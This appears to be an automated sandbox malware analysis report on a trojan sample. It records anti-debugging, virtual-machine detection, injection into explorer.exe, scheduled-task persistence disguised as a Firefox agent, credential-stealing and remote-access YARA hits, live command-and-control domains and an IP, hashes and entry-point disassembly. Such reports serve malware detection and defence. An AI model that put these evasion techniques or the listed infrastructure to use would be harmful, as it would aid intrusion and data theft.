                  Source: C:\Windows\explorer.exe TID: 6104Thread sleep count: 317 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 6104Thread sleep time: -31700s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 5880Thread sleep count: 248 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 5216Thread sleep count: 464 > 30Jump to behavior
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 672Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 412Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 576Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 464Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                  Source: explorer.exe, 00000001.00000000.264913549.0000000007AFF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                  Source: explorer.exe, 00000001.00000000.325633709.0000000007B66000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
                  Source: explorer.exe, 00000001.00000000.271656643.000000000F278000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000001.00000000.296837092.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000001.00000000.259525432.0000000005EF4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000001.00000000.296837092.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
                  Source: explorer.exe, 00000001.00000000.291761489.0000000005F12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B092B mov eax, dword ptr fs:[00000030h]0_2_006B092B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B0D90 mov eax, dword ptr fs:[00000030h]0_2_006B0D90
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BE81E push dword ptr fs:[00000030h]0_2_008BE81E
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 11_2_006E092B mov eax, dword ptr fs:[00000030h]11_2_006E092B
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 11_2_006E0D90 mov eax, dword ptr fs:[00000030h]11_2_006E0D90
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 14_2_005A092B mov eax, dword ptr fs:[00000030h]14_2_005A092B
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaCode function: 14_2_005A0D90 mov eax, dword ptr fs:[00000030h]14_2_005A0D90
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaProcess queried: DebugPortJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\explorer.exeFile created: vbfvrba.1.drJump to dropped file
                  Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                  Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 2671930Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaThread created: unknown EIP: 2691930Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vbfvrbaThread created: unknown EIP: 4531930Jump to behavior
                  Source: explorer.exe, 00000001.00000000.309348259.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.255414725.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286060810.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 00000001.00000000.296783129.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.325706644.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.309348259.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000001.00000000.308505060.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.255215437.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.309348259.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000001.00000000.309348259.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.255414725.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286060810.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 14.2.vbfvrba.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.3.vbfvrba.5b0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.vbfvrba.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.vbfvrba.5a0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.6c0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.3.vbfvrba.21b0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.6b0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.vbfvrba.6e0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.458450131.00000000005B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000003.446586296.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.377030181.00000000021F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.364685451.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.243844808.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.327792065.0000000000860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.458781769.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.327822813.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.377400822.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.316092532.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 14.2.vbfvrba.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.3.vbfvrba.5b0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.vbfvrba.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.vbfvrba.5a0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.6c0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.3.vbfvrba.21b0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.6b0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.vbfvrba.6e0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.458450131.00000000005B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000003.446586296.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.377030181.00000000021F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.364685451.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.243844808.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.327792065.0000000000860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.458781769.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.327822813.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.377400822.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.316092532.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts1
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  32
                  Process Injection
                  11
                  Masquerading
                  1
                  Input Capture
                  311
                  Security Software Discovery
                  Remote Services1
                  Input Capture
                  Exfiltration Over Other Network Medium2
                  Non-Application Layer Protocol
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading
                  12
                  Virtualization/Sandbox Evasion
                  LSASS Memory12
                  Virtualization/Sandbox Evasion
                  Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth112
                  Application Layer Protocol
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)32
                  Process Injection
                  Security Account Manager3
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Hidden Files and Directories
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Obfuscated Files or Information
                  LSA Secrets3
                  System Information Discovery
                  SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  Software Packing
                  Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                  File Deletion
                  Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 715074 Sample: file.exe Startdate: 03/10/2022 Architecture: WINDOWS Score: 100 23 host-file-host6.com 2->23 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 4 other signatures 2->43 7 file.exe 2->7         started        10 vbfvrba 2->10         started        12 vbfvrba 2->12         started        signatures3 process4 signatures5 45 Detected unpacking (changes PE section rights) 7->45 47 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->47 49 Maps a DLL or memory area into another process 7->49 14 explorer.exe 2 7->14 injected 51 Machine Learning detection for dropped file 10->51 53 Checks if the current machine is a virtual machine (disk enumeration) 10->53 55 Creates a thread in another existing process (thread injection) 10->55 process6 dnsIp7 25 host-file-host6.com 176.124.192.17, 49703, 80 GULFSTREAMUA Russian Federation 14->25 27 host-host-file8.com 14->27 19 C:\Users\user\AppData\Roaming\vbfvrba, PE32 14->19 dropped 21 C:\Users\user\...\vbfvrba:Zone.Identifier, ASCII 14->21 dropped 29 System process connects to network (likely due to code injection or exploit) 14->29 31 Benign windows process drops PE files 14->31 33 Deletes itself after installation 14->33 35 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->35 file8 signatures9

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  file.exe37%VirustotalBrowse
                  file.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\vbfvrba100%Joe Sandbox ML
                  SourceDetectionScannerLabelLinkDownload
                  14.3.vbfvrba.5b0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.2.vbfvrba.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.2.vbfvrba.6e0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  0.2.file.exe.6b0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  0.3.file.exe.6c0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.3.vbfvrba.21b0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  14.2.vbfvrba.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  14.2.vbfvrba.5a0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://host-file-host6.com/0%URL Reputationsafe
                  http://host-host-file8.com/100%URL Reputationmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  host-file-host6.com
                  176.124.192.17
                  truetrue
                    unknown
                    host-host-file8.com
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://host-file-host6.com/true
                      • URL Reputation: safe
                      unknown
                      http://host-host-file8.com/true
                      • URL Reputation: malware
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      176.124.192.17
                      host-file-host6.comRussian Federation
                      59652GULFSTREAMUAtrue
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:715074
                      Start date and time:2022-10-03 15:57:31 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 7m 35s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:file.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@3/2@4/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 28.8% (good quality ratio 24.4%)
                      • Quality average: 45.2%
                      • Quality standard deviation: 27.1%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 23
                      • Number of non-executed functions: 3
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      TimeTypeDescription
                      15:59:22Task SchedulerRun new task: Firefox Default Browser Agent 937156EFB9A900F6 path: C:\Users\user\AppData\Roaming\vbfvrba
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      176.124.192.17file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      cxkx7noXjk.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      file.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      host-file-host6.comfile.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      cxkx7noXjk.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      GULFSTREAMUA1F5u1OLUIL.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      gDi307GEL8.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      file.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      b3qxSkoyqZ.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      seEj6LCl8Q.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      WyUgKIIIA7.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      mOEDk7DTO8.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      vBhGoJ2eBE.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      ylAnmoMOHr.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      m7SrZ70aSv.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      ENxmvObIFB.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      DcLsmf1fcj.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      cxkx7noXjk.exeGet hashmaliciousBrowse
                      • 176.124.192.17
                      jAJNvSlmVJ.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      tBjXhpQk1M.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      VLF9ty2Rko.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      TtBAu0bmi5.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      Ka5xfjZmVX.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      xi5rsepRK2.exeGet hashmaliciousBrowse
                      • 176.124.192.220
                      No context
                      No context
                      Process:C:\Windows\explorer.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):150016
                      Entropy (8bit):6.777924709615045
                      Encrypted:false
                      SSDEEP:3072:0jiakzWt9fGfGXLHuAr+ax7OwtUqzxsaCCSSbO:0j8qbHbKItdWaLV
                      MD5:E337A4D30D5B3CC3BCF3D3789DAD3566
                      SHA1:739B485A3633B500C43320E98488538C0BDA3106
                      SHA-256:BDDB07A1BC6EFFA8751CE6B40FC5E86F6C31F0B2403E696C99B522D89DD179DD
                      SHA-512:6C054CFC49CBADF90850F15CF7B6DFE3D801EEFD55E017F212B261FB3E03C4BB37EE94F0B31C2983EE3FC00BE32E90B2642994F24B05D4AA7D8E140EC79205B1
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}..............N1......N'................D....N ......N0......N5.....Rich............PE..L...4..`.....................6.......L............@.................................y...........................................P........K..........................................................0,..@............................................text............................... ..`.data...............................@....rsrc....K.......L..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\explorer.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:[ZoneTransfer]....ZoneId=0
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):6.777924709615045
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:150016
                      MD5:e337a4d30d5b3cc3bcf3d3789dad3566
                      SHA1:739b485a3633b500c43320e98488538c0bda3106
                      SHA256:bddb07a1bc6effa8751ce6b40fc5e86f6c31f0b2403e696c99b522d89dd179dd
                      SHA512:6c054cfc49cbadf90850f15cf7b6dfe3d801eefd55e017f212b261fb3e03c4bb37ee94f0b31c2983ee3fc00be32e90b2642994f24b05d4aa7d8e140ec79205b1
                      SSDEEP:3072:0jiakzWt9fGfGXLHuAr+ax7OwtUqzxsaCCSSbO:0j8qbHbKItdWaLV
                      TLSH:6AE3DF2139A0C473C616CA710874D964BB3FF9926B3985477B8C2B2D0F713D25EBA35A
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}...............N1......N'.................D....N ......N0......N5.....Rich............PE..L...4..`.....................6.....
                      Icon Hash:32f2c4ccccc692a0
                      Entrypoint:0x404c07
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x60C1FF34 [Thu Jun 10 12:01:56 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:2d5ec24fb9d2ee4cf8208f9e16125d4f
                      Instruction
                      call 00007F4DC8D091DBh
                      jmp 00007F4DC8D05D6Dh
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      mov ecx, dword ptr [esp+04h]
                      test ecx, 00000003h
                      je 00007F4DC8D05F16h
                      mov al, byte ptr [ecx]
                      add ecx, 01h
                      test al, al
                      je 00007F4DC8D05F40h
                      test ecx, 00000003h
                      jne 00007F4DC8D05EE1h
                      add eax, 00000000h
                      lea esp, dword ptr [esp+00000000h]
                      lea esp, dword ptr [esp+00000000h]
                      mov eax, dword ptr [ecx]
                      mov edx, 7EFEFEFFh
                      add edx, eax
                      xor eax, FFFFFFFFh
                      xor eax, edx
                      add ecx, 04h
                      test eax, 81010100h
                      je 00007F4DC8D05EDAh
                      mov eax, dword ptr [ecx-04h]
                      test al, al
                      je 00007F4DC8D05F24h
                      test ah, ah
                      je 00007F4DC8D05F16h
                      test eax, 00FF0000h
                      je 00007F4DC8D05F05h
                      test eax, FF000000h
                      je 00007F4DC8D05EF4h
                      jmp 00007F4DC8D05EBFh
                      lea eax, dword ptr [ecx-01h]
                      mov ecx, dword ptr [esp+04h]
                      sub eax, ecx
                      ret
                      lea eax, dword ptr [ecx-02h]
                      mov ecx, dword ptr [esp+04h]
                      sub eax, ecx
                      ret
                      lea eax, dword ptr [ecx-03h]
                      mov ecx, dword ptr [esp+04h]
                      sub eax, ecx
                      ret
                      lea eax, dword ptr [ecx-04h]
